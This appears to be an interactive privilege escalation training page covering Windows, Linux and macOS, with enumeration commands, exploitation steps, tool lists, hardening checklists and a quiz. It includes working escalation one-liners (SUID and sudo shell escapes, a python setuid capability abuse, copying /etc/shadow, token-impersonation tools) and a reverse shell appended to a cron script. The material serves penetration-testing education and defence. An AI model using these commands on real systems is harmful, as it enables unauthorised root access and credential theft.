Privilege Escalation Lab
Master the art of elevating privileges from user to root/system in Windows, Linux, and macOS environments
What is Privilege Escalation?
Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight to gain elevated access to resources that are normally protected from an application or user.
Two Main Types:
- Horizontal: Access resources of another user at the same privilege level
- Vertical: Gain higher privileges (user → admin/root)
Attack Lifecycle
1. Initial Access (low privileges)
↓
2. Enumeration & Discovery
↓
3. Vulnerability Identification
↓
4. Exploitation
↓
5. Privilege Escalation
↓
6. Persistence & Lateral Movement
Why It Matters
Understanding privilege escalation is crucial for both offensive and defensive security:
- Attackers use it to gain full system control
- Defenders need to identify and remediate weaknesses
- Critical step in most penetration tests
- Helps in hardening system configurations
Privilege Escalation Journey
Windows Privilege Escalation Paths
Unquoted Service Paths
Services with unquoted paths containing spaces can be exploited to execute arbitrary code with SYSTEM privileges.
C:\Program Files\My Service\service.exe
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Service\service.exe
AlwaysInstallElevated
If both registry keys are enabled, MSI packages install with SYSTEM privileges regardless of user permissions.
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated = 1
DLL Hijacking
Applications loading DLLs from insecure locations can be exploited by placing malicious DLLs in the search path.
1. Application directory
2. System32 directory
3. System directory
4. Windows directory
5. Current directory
6. PATH directories
Scheduled Tasks Abuse
Scheduled tasks running with elevated privileges but pointing to modifiable scripts or executables.
schtasks /query /fo LIST /v
Get-ScheduledTask | Get-ScheduledTaskInfo
Token Impersonation
SeImpersonatePrivilege allows processes to impersonate tokens of other users, potentially escalating to SYSTEM.
whoami /priv
Unattended Installations
Configuration files left from automated installations may contain plaintext credentials.
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\System32\sysprep\unattend.xml
Linux Privilege Escalation Paths
SUID/SGID Binaries
Binaries with SUID/SGID bits set run with the owner's privileges, potentially allowing escalation if misconfigured.
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
Sudo Misconfigurations
Overly permissive sudo configurations allow users to run commands as root without proper restrictions.
sudo -l
user ALL=(ALL) NOPASSWD: /usr/bin/vim
Cron Job Exploitation
Scheduled tasks running as root with world-writable scripts or in writable directories can be hijacked.
/etc/crontab
/etc/cron.d/*
/var/spool/cron/crontabs/*
crontab -l
Kernel Exploits
Outdated kernels may contain exploitable vulnerabilities allowing privilege escalation to root.
uname -a
cat /proc/version
lsb_release -a
PATH Variable Manipulation
If scripts use relative paths and PATH is modifiable, malicious binaries can be executed with elevated privileges.
export PATH=/tmp:$PATH
# Create malicious binary in /tmp
Capabilities Abuse
Linux capabilities allow fine-grained privilege control. Misconfigured capabilities can lead to escalation.
getcap -r / 2>/dev/null
/usr/bin/python3 = cap_setuid+ep
macOS Privilege Escalation Paths
Dylib Hijacking
macOS applications may load dynamic libraries (dylibs) from insecure locations, similar to DLL hijacking on Windows.
1. @rpath (runtime search path)
2. @loader_path (loader directory)
3. @executable_path (executable directory)
4. Fallback to system paths
otool -L /path/to/binary
DYLD_PRINT_LIBRARIES=1 /path/to/binary
plist Abuse
Property list files control system behavior. World-writable plists or those in user-controlled directories can be exploited.
/Library/LaunchDaemons/
/System/Library/LaunchDaemons/
~/Library/LaunchAgents/
ls -la /Library/LaunchDaemons/
plutil -p /path/to/plist
Sudo Misconfigurations
Similar to Linux, macOS sudo misconfigurations allow command execution as root.
sudo -l
cat /etc/sudoers
TCC Database Abuse
Transparency, Consent, and Control (TCC) database controls app permissions. Modifying it can grant unauthorized access.
~/Library/Application Support/com.apple.TCC/TCC.db
/Library/Application Support/com.apple.TCC/TCC.db
SUID Binaries
Like Linux, macOS SUID binaries can be exploited if misconfigured.
find / -perm -4000 -type f 2>/dev/null
Kernel Extensions (kexts)
Loading malicious kernel extensions can provide full system control.
kextstat
kextfind -loaded -b com.apple
Technique Comparison Matrix
Exploit services with paths containing spaces but no quotes.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notmatch '\"' -and $_.PathName -match ' '} | Select Name, PathName, StartMode
1. Identify vulnerable service path
2. Check write permissions on parent directories
3. Place malicious executable in exploitable location
4. Restart service or wait for reboot
Identify applications vulnerable to DLL hijacking.
robber.exe -d C:\Program Files\VulnerableApp
1. Run procmon.exe
2. Filter: Result is "NAME NOT FOUND"
3. Filter: Path ends with ".dll"
4. Identify writable locations
Leverage SeImpersonatePrivilege to escalate to SYSTEM.
whoami /priv | findstr "SeImpersonatePrivilege"
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -t *
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
Abuse SUID binaries to execute commands as the file owner (often root).
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
# vim/vi
:set shell=/bin/bash
:shell
# find
find / -exec /bin/bash -p \; -quit
# nmap (older versions)
nmap --interactive
!sh
# Always check GTFOBins for exploitation methods
# https://gtfobins.github.io/
Exploit misconfigured sudo permissions.
sudo -l
# If vim is allowed
sudo vim -c ':!/bin/bash'
# If less is allowed
sudo less /etc/profile
!/bin/bash
# If python is allowed
sudo python -c 'import os; os.system("/bin/bash")'
Hijack scheduled tasks running with elevated privileges.
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*
find /etc/cron.* -type f -perm -o+w 2>/dev/null
# Append reverse shell to writable cron script
echo 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' >> /path/to/script.sh
Abuse Linux capabilities assigned to binaries.
getcap -r / 2>/dev/null
# cap_setuid - allows changing UID
/usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_dac_read_search - read any file
tar -cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
Cross-Platform Comparison
SUID Binary Finder Simulator
Practice identifying SUID binaries in a simulated Linux environment. Click "Scan System" to enumerate binaries with the SUID bit set.
What is SUID?
SUID (Set User ID) is a special permission that allows a file to be executed with the privileges of the file owner, rather than the user running it.
-rwsr-xr-x (SUID bit = 's' in owner execute position)
-rwxr-sr-x (SGID bit = 's' in group execute position)
Common Vulnerable Binaries
• /usr/bin/find
• /usr/bin/vim
• /usr/bin/nmap (older versions)
• /usr/bin/python
• /usr/bin/perl
• /usr/bin/bash
• /usr/bin/less
• /usr/bin/more
Exploitation Resources
Always reference GTFOBins for SUID exploitation techniques:
https://gtfobins.github.io/
Search for the binary name to find:
• Shell escape sequences
• File read/write methods
• Sudo exploitation
• SUID exploitationUnquoted Service Path Checker
Test Windows service paths for the unquoted path vulnerability. Enter a service path to check if it's vulnerable.
Enter Service Path
How It Works
When Windows encounters an unquoted path with spaces, it tries to execute files in this order:
1. C:\Program.exe
2. C:\Program Files\My.exe
3. C:\Program Files\My App\service.exe
An attacker with write access to C:\ or C:\Program Files\ can place a malicious executable that gets executed instead.
Exploitation Requirements
- Service path contains spaces
- Service path is NOT quoted
- Write permissions on intermediate directories
- Service runs with elevated privileges
- Ability to restart service or system
Remediation
Always quote service paths containing spaces:
C:\Program Files\My Application\service.exe
"C:\Program Files\My Application\service.exe"
Test These Examples
C:\Program Files\Vulnerable Service\app.exe
C:\Custom Apps\My Service\bin\service.exe
"C:\Program Files\Safe Service\app.exe"
C:\Windows\System32\svchost.exe
Privilege Escalation Tools
Comprehensive reference for automated enumeration and exploitation tools. Click any command to copy to clipboard.
Automated Windows enumeration script that checks for common privilege escalation vectors.
Part of PEASS-ng suite. Outputs color-coded findings.
PowerShell script for Windows privilege escalation enumeration.
Compares system patch level against Microsoft vulnerability database.
C# project for offensive security host survey and situational awareness.
Post-exploitation tool to check common Windows misconfigurations.
Enumerate missing KBs and suggest exploits for Privilege Escalation.
Tool to find DLL hijacking opportunities.
Automated Linux/Unix enumeration script.
Python script to enumerate system configuration and identify privilege escalation vectors.
Suggests kernel exploits based on operating system version.
Shell script to check for common privilege escalation vectors.
Unprivileged Linux process snooping to detect cron jobs, etc.
Manual enumeration commands for finding exploitable binaries.
Cross-platform privilege escalation suite (WinPEAS, LinPEAS, MacPEAS).
git clone https://github.com/carlospolop/PEASS-ng.git
Supports Windows, Linux, and macOS with color-coded output.
Available for Windows, Linux, and macOS.
Automated exploit suggestion based on active session.
Essential commands to run on any system.
# Windows
systeminfo
whoami /all
# Linux
uname -a
id
cat /etc/os-release
# Windows
ipconfig /all
netstat -ano
# Linux
ifconfig
netstat -tulpn
Defense & Hardening
Implement these security measures to prevent privilege escalation attacks. Check off items as you implement them.
General Security Measures
Regularly apply security patches and updates for OS and applications
Users and services should operate with minimal required permissions
Implement MFA for all administrative accounts
Use AppLocker or similar to control executable execution
Enable comprehensive logging and monitor for suspicious activity
Windows-Specific Hardening
Ensure all service paths with spaces are properly quoted
Remove registry keys that allow MSI installation with elevated privileges
Enable SafeDllSearchMode and use fully qualified paths
Audit tasks for proper permissions and secure script locations
Minimize SeImpersonate and other dangerous privileges
Delete unattend.xml and similar files containing credentials
Linux-Specific Hardening
Regularly review and remove unnecessary SUID/SGID permissions
Use specific command paths, avoid NOPASSWD where possible
Ensure cron scripts are owned by root with proper permissions (644)
Keep kernel updated to patch privilege escalation vulnerabilities
Use absolute paths in scripts, restrict PATH modifications
Audit and minimize Linux capabilities on binaries
Use mandatory access control systems
CIS Hardening Guides
Follow Center for Internet Security benchmarks:
- CIS Microsoft Windows Benchmarks
- CIS Linux Distribution Benchmarks
- CIS Apple macOS Benchmarks
STIG Compliance
Implement Security Technical Implementation Guides:
- DoD Windows STIGs
- DoD Linux STIGs
- Regular compliance scanning
Monitoring & Detection
Implement detection mechanisms:
- EDR/XDR solutions
- SIEM correlation rules
- File integrity monitoring
- Privilege escalation alerts
Privilege Escalation Assessment
Test your knowledge with these 12 questions. Score 80% or higher to earn 80 XP!